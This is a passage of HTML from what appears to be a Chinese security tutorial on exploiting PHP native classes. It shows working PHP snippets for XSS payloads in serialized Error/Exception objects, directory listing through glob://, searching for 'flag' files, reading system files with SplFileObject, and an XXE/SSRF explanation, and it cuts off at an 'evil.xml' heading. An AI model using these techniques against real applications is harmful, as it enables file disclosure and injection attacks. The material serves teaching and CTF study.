data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=108\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-78.png\" data-orig-size=\"1919,948\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-78-300x148.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-78-1024x506.png\" 
data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-78-1024x506.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-108\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u287defdd\"><\/p>\n\n\n\n<p id=\"u287defdd\">\u6210\u529f\u89e6\u53d1$profile-&gt;pass==&#8217;escaping&#8217;\u540e\u9762\u7684\u4ee3\u7801<\/p>\n\n\n\n<p id=\"ubaf69a95\">\u8fdc\u7a0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-79-1024x248.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"248\" data-attachment-id=\"109\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=109\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-79.png\" data-orig-size=\"1920,465\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-79-300x73.png\" 
data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-79-1024x248.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-79-1024x248.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-109\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"xQEYi\">php\u5e38\u89c1\u539f\u751f\u7c7b\u603b\u7ed3<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"HHY2O\">\u63a2\u6d4b\u539f\u751f\u7c7b<\/h4>\n\n\n\n<p id=\"u3c89b325\">\u8fd9\u6bb5\u4ee3\u7801\u53ef\u4ee5\u63a2\u6d4b\u5f53\u524dphp\u73af\u5883\u52a0\u8f7d\u7684\u539f\u751f\u7c7b<\/p>\n\n\n\n<pre id=\"b4DKF\" class=\"wp-block-code\"><code>&lt;?php\n$Phantom = get_declared_classes();\nforeach ($Phantom as $Phantom1) {\n    $Phantom2 = get_class_methods($Phantom1);\n    foreach ($Phantom2 as $Phantom3) {\n        if (in_array($Phantom3, array('__destruct', '__toString', '__wakeup', '__call', '__callStatic'))) {\n            print $Phantom1 . '::' . $Phantom3 . 
\"\\n\";\n        }\n    }\n}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-80-1024x576.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"110\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=110\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-80.png\" data-orig-size=\"1919,1079\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-80-300x169.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-80-1024x576.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-80-1024x576.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-110\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" 
id=\"NuG9P\">\u5e38\u7528\u53ef\u5229\u7528\u539f\u751f\u7c7b\u5217\u8868<\/h4>\n\n\n\n<pre id=\"aBfG4\" class=\"wp-block-code\"><code>Exception\/Error\u7cfb\u5217\uff1aException, Error, ErrorException, \u5404\u7c7bRuntimeException\n\u6587\u4ef6\u64cd\u4f5c\u7c7b\uff1aDirectoryIterator, FilesystemIterator, SplFileObject, GlobIterator\nXML\u5904\u7406\u7c7b\uff1aSimpleXMLElement\nWeb\u670d\u52a1\u7c7b\uff1aSoapClient\n\u538b\u7f29\u7c7b\uff1aZipArchive\n\u65e5\u671f\u65f6\u95f4\u7c7b\uff1aDateTime, DateInterval\n\u53cd\u5c04\u7c7b\uff1aReflectionClass, ReflectionMethod<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"WgMp5\">XSS\uff08Error\/Exception\uff09<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"Rhs4X\">XSS Payload\u6784\u9020<\/h5>\n\n\n\n<p id=\"ub3c91f00\"><strong>\u6d89\u53ca\u7c7b\uff1a<\/strong><\/p>\n\n\n\n<p id=\"u5d347861\"><code>Error<\/code> (PHP 7+)<\/p>\n\n\n\n<p id=\"u6e9eeb0d\"><code>Exception<\/code> (PHP 5\/7)<\/p>\n\n\n\n<p id=\"ua9525bd2\">\u4ee5\u53ca\u4f60\u5217\u8868\u4e2d\u7684\u5b50\u7c7b\uff1a<code>ParseError<\/code>, <code>TypeError<\/code>, <code>ArgumentCountError<\/code>, <code>ArithmeticError<\/code>, <code>DivisionByZeroError<\/code><\/p>\n\n\n\n<pre id=\"MDTES\" class=\"wp-block-code\"><code>&lt;?php\n\/\/ \u57fa\u7840XSS Payload\n$Phantom = new Error(\"&lt;script&gt;alert('Error')&lt;\/script&gt;\");\n$Phantom1 = new Exception(\"&lt;img src=x onerror=alert('Exception')&gt;\");\n\necho \"Error Payload: \" . serialize($Phantom) . \"\\n\";\necho \"Exception Payload: \" . 
serialize($Phantom1);\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-81.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"565\" height=\"200\" data-attachment-id=\"111\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=111\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-81.png\" data-orig-size=\"565,200\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-81-300x106.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-81.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-81.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-111\"  sizes=\"auto, (max-width: 565px) 100vw, 565px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-82.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"670\" height=\"200\" data-attachment-id=\"112\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=112\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-82.png\" data-orig-size=\"670,200\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-82-300x90.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-82.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-82.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-112\"  sizes=\"auto, (max-width: 670px) 100vw, 670px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"bkoEQ\">\u6587\u4ef6\u76ee\u5f55\u904d\u5386<\/h4>\n\n\n\n<p id=\"uaa3bdb0d\"><strong>\u6d89\u53ca\u7c7b\uff1a<\/strong><\/p>\n\n\n\n<p id=\"u67acf734\"><code>DirectoryIterator<\/code><\/p>\n\n\n\n<p id=\"u1e9825ab\"><code>FilesystemIterator<\/code><\/p>\n\n\n\n<p 
id=\"u31fed61a\"><code>GlobIterator<\/code><\/p>\n\n\n\n<p id=\"u27ebc871\"><strong>\u5229\u7528\u539f\u7406\uff1a<\/strong> \u8fd9\u4e9b\u7c7b\u5b9e\u73b0\u4e86\u8fed\u4ee3\u5668\u63a5\u53e3\uff0c\u914d\u5408 PHP \u7684 <code>glob:\/\/<\/code> \u4f2a\u534f\u8bae\uff0c\u53ef\u4ee5\u67e5\u627e\u5e76\u8f93\u51fa\u6587\u4ef6\u540d\u3002<\/p>\n\n\n\n<p id=\"ud2d35f3d\"><code>DirectoryIterator<\/code> \/ <code>FilesystemIterator<\/code>: \u9700\u8981\u914d\u5408 <code>glob:\/\/<\/code> \u534f\u8bae\u6765\u5339\u914d\u901a\u914d\u7b26\u3002<\/p>\n\n\n\n<p id=\"u6cd3c095\"><code>GlobIterator<\/code>: \u81ea\u5e26 Glob \u6a21\u5f0f\u5339\u914d\uff0c\u4e0d\u9700\u8981\u4f2a\u534f\u8bae\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"aeYRN\">DirectoryIterator \/ FilesystemIterator (\u914d\u5408 glob \u534f\u8bae)<\/h5>\n\n\n\n<pre id=\"jQGps\" class=\"wp-block-code\"><code>&lt;?php\n$Phantom = new DirectoryIterator(\"glob:\/\/\/*\");\nforeach ($Phantom as $Phantom1) {\n    \/\/ \u80fd\u591f\u904d\u5386\u8f93\u51fa\u6240\u6709\u5339\u914d\u7684\u6587\u4ef6\u540d\n    echo $Phantom1 . 
\"\\n\";\n}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-83-1024x536.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"536\" data-attachment-id=\"113\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=113\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-83.png\" data-orig-size=\"1919,1005\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-83-300x157.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-83-1024x536.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-83-1024x536.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-113\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"UoJ78\">GlobIterator (\u81ea\u5e26\u6a21\u5f0f\u5339\u914d)<\/h5>\n\n\n\n<pre id=\"f6ODC\" 
class=\"wp-block-code\"><code>&lt;?php\n\/\/ \u67e5\u627e\u76ee\u5f55\u4e0b\u540d\u5b57\u5305\u542b flag \u7684\u6587\u4ef6\n$Phantom = new GlobIterator(\"*flag*\");\nforeach ($Phantom as $Phantom1) {\n    echo $Phantom1 . \"\\n\";\n}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-84-1024x556.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"556\" data-attachment-id=\"114\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=114\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-84.png\" data-orig-size=\"1359,738\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-84-300x163.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-84-1024x556.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-84-1024x556.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" 
class=\"wp-image-114\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"VkeaI\">\u6587\u4ef6\u5185\u5bb9\u8bfb\u53d6 (SplFileObject)<\/h4>\n\n\n\n<p id=\"u6e9f8de1\"><strong>\u6d89\u53ca\u7c7b\uff1a<\/strong><\/p>\n\n\n\n<p id=\"u73f67106\"><code>SplFileObject<\/code><\/p>\n\n\n\n<p id=\"u5ddf8e3b\"><code>SplTempFileObject<\/code> (\u8f83\u5c11\u7528\uff0c\u4f46\u539f\u7406\u7c7b\u4f3c)<\/p>\n\n\n\n<p id=\"u243b3b9b\"><strong>\u5229\u7528\u539f\u7406\uff1a<\/strong><code>SplFileObject<\/code> \u662f\u4e3a\u6587\u4ef6\u63d0\u4f9b\u9762\u5411\u5bf9\u8c61\u63a5\u53e3\u7684\u7c7b\u3002\u5b83\u5141\u8bb8\u5c06\u6587\u4ef6\u5f53\u4f5c\u5bf9\u8c61\u6765\u5904\u7406\uff0c\u53ef\u4ee5\u76f4\u63a5\u904d\u5386\u8bfb\u53d6\u6587\u4ef6\u5185\u5bb9\u3002\u8fd9\u5728\u65e0\u6cd5\u4f7f\u7528 <code>file_get_contents<\/code> \u4f46\u80fd\u53cd\u5e8f\u5217\u5316\u8be5\u7c7b\u65f6\u975e\u5e38\u6709\u7528\u3002需要注意，<code>SplFileObject<\/code> 本身不允许序列化和反序列化，<code>serialize()<\/code> 与 <code>unserialize()<\/code> 都会直接抛出异常，所以它不会以序列化数据的形式出现；审计时应检查类名和构造参数是否能被外部输入控制。<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"H78mN\">\u654f\u611f\u6587\u4ef6\u8bfb\u53d6<\/h5>\n\n\n\n<pre id=\"D90eL\" class=\"wp-block-code\"><code>&lt;?php\n$Phantom = new SplFileObject('C:\/Windows\/System32\/drivers\/etc\/hosts');\n\/\/ \u904d\u5386\u8bfb\u53d6\u6bcf\u4e00\u884c\nforeach ($Phantom as $Phantom1) {\n    echo $Phantom1;\n}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-85-1024x556.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"556\" data-attachment-id=\"115\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=115\" 
data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-85.png\" data-orig-size=\"1359,738\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-85-300x163.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-85-1024x556.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-85-1024x556.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-115\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"c9nj5\">XXE (XML \u5916\u90e8\u5b9e\u4f53\u6ce8\u5165)<\/h4>\n\n\n\n<p id=\"ud397fb17\"><strong>\u6d89\u53ca\u7c7b\uff1a<\/strong><\/p>\n\n\n\n<p id=\"ucd504d2e\"><code>SimpleXMLElement<\/code><\/p>\n\n\n\n<p id=\"u76848f3b\"><strong>\u5229\u7528\u539f\u7406\uff1a<\/strong><code>SimpleXMLElement<\/code> \u7528\u4e8e\u89e3\u6790 XML\u3002\u5176\u6784\u9020\u51fd\u6570\u7684\u7b2c\u4e09\u4e2a\u53c2\u6570 <code>data_is_url<\/code> \u5982\u679c\u8bbe\u7f6e\u4e3a <code>true<\/code>\uff0c\u4e14\u7cfb\u7edf\u5f00\u542f\u4e86\u5916\u90e8\u5b9e\u4f53\u52a0\u8f7d\uff08\u9700\u8981\u914d\u5408 <code>LIBXML_NOENT<\/code> \u5e38\u91cf\uff09\uff0c\u5219\u53ef\u4ee5\u53d1\u8d77\u5916\u90e8\u8bf7\u6c42\uff0c\u9020\u6210 XXE \u6216 
SSRF\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-86-1024x389.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"389\" data-attachment-id=\"116\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=116\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-86.png\" data-orig-size=\"1685,640\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-86-300x114.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-86-1024x389.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-86-1024x389.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-116\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"jgiuP\">\u8bfb\u6587\u4ef6<\/h5>\n\n\n\n<p id=\"u43340c60\">evil.xml<br><\/p>\n\n\n\n<pre id=\"tJTjR\" 
